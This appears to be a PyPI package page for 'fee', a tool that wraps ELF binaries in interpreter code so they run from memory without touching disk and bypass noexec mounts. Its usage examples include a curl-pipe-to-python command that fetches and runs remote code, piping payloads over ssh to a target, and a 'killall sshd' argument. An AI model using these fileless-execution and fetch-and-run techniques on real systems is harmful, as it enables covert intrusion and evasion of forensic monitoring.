Skip to main content

Execute ELF files without dropping them on disk

Project description

Execute ELF files on a machine without dropping an ELF

Code style: black

Description

This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs). This makes it possible to execute binaries without leaving traces on the disk.

The technique used for this is explained here.

With default options for each interpreter, running binaries using fee does not write to disk whatsoever. This can be verified using tools such as strace.

fee also completely ignores and bypasses noexec mount flags, even if they were set on /proc.

Target requirements

  • kernel: 3.17 or later (for memfd_create support)
  • An interpreter. Any of these:
    • Python 2
    • Python 3
    • Perl
    • Ruby

Installation

Install this on your host machine using pipx:

$ pipx install fee

... or regular pip:

$ pip install --user fee

You may also clone this repository and run the script directly.

Usage

Basic usage: supply the path to the binary you wish to drop:

$ fee /path/to/binary > output.py

You can then pipe this into Python on the target:

$ curl my.example.site/output.py | python

Alternatively, you may generate Perl or Ruby code instead with the --lang flag (-l):

$ fee /path/to/binary -l pl | perl
$ fee /path/to/binary -l rb | ruby

If you want to pipe over ssh, use the --with-command flag (-c) to wrap the output in python -c (or perl -e, ruby -e accordingly):

$ fee -c /path/to/binary | ssh user@target

When piping over ssh, you sometimes want to wrap the long line which holds the base64-encoded version of the binary, as some shells do not like super long input strings. You can accomplish this with the --wrap flag (-w):

$ fee -c /path/to/binary -w 64 | ssh user@target

If you want to customise the arguments, use the --argv flag (-a):

$ fee -a "killall sshd" ./busybox > output.py

If you don't wish to include the binary in the generated output, you can instruct fee to generate a script which accepts the ELF from stdin at runtime. For this, use - for the filename. You can combine all of these options for clever one-liners:

$ ssh user@target "$(fee -c -a "echo hi from stdin" -t "libc" -)" < ./busybox

hi from stdin

NB! By default, the script parses the encoded ELF's header to determine the target architecture. This is required to use the correct syscall number when calling memfd_create. If this fails, you can use the --target-architecture (-t) flag to explicitly generate a syscall number. Alternatively, you can use the libc target to resolve the symbol automatically at runtime, although this only works when generating Python code. For more exotic platforms, you should specify the syscall number manually. You need to search for memfd_create in your target's architecture's syscall table. This is located in various places in the Linux kernel sources. Just Googling [architecture] syscall table is perhaps the easiest. You can then specify the syscall number using the --syscall flag (-s).

Full help text:

usage: fee.py [-h] [-t ARCH | -s NUM] [-a ARGV] [-l LANG] [-c] [-p PATH] [-w CHARS] [-z LEVEL]
              path

Print code to stdout to execute an ELF without dropping files.

positional arguments:
  path                  path to the ELF file (use '-' to read from stdin at runtime)

optional arguments:
  -h, --help            show this help message and exit
  -t ARCH, --target-architecture ARCH
                        target platform for resolving memfd_create (default: detect from ELF)
  -s NUM, --syscall NUM
                        syscall number for memfd_create for the target platform
  -a ARGV, --argv ARGV  space-separated arguments (including argv[0]) supplied to execle (default:
                        path to file as argv[0])
  -l LANG, --language LANG
                        language for the generated code (default: python)
  -c, --with-command    wrap the generated code in a call to an interpreter, for piping directly
                        into ssh
  -p PATH, --interpreter-path PATH
                        path to interpreter on target if '-c' is used, otherwise a sane default is
                        used
  -w CHARS, --wrap CHARS
                        when base64-encoding the elf, how many characters to wrap to a newline
                        (default: 0)
  -z LEVEL, --compression-level LEVEL
                        zlib compression level, 0-9 (default: 9)

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

fee-0.2.0.tar.gz (19.4 kB view details)

Uploaded Source

Built Distribution

fee-0.2.0-py3-none-any.whl (19.5 kB view details)

Uploaded Python 3

File details

Details for the file fee-0.2.0.tar.gz.

File metadata

  • Download URL: fee-0.2.0.tar.gz
  • Upload date:
  • Size: 19.4 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: poetry/1.1.11 CPython/3.9.7 Linux/5.14.17-hardened1-1-hardened

File hashes

Hashes for fee-0.2.0.tar.gz
Algorithm Hash digest
SHA256 76f21ebfc827b5699c0213ac34ac14f0310e4947fd61687132d0cc6526dc117d
MD5 88cf721c8f5a66d890c3dbf135e4d488
BLAKE2b-256 25f24af52bde6b612b150d9251372cb54262b0ba664cb2c881457f81174e5573

See more details on using hashes here.

File details

Details for the file fee-0.2.0-py3-none-any.whl.

File metadata

  • Download URL: fee-0.2.0-py3-none-any.whl
  • Upload date:
  • Size: 19.5 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: poetry/1.1.11 CPython/3.9.7 Linux/5.14.17-hardened1-1-hardened

File hashes

Hashes for fee-0.2.0-py3-none-any.whl
Algorithm Hash digest
SHA256 1697f0b89aee4c82ae74f6b34f51c2a4701b204603c905f5d018c79ccd02b7d1
MD5 18b0818876a962fb9574c29c4750a278
BLAKE2b-256 48df89b40ae8f811a983198823dfc0ab89cc35c2bbbf0c54ce3c718da63053e8

See more details on using hashes here.

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page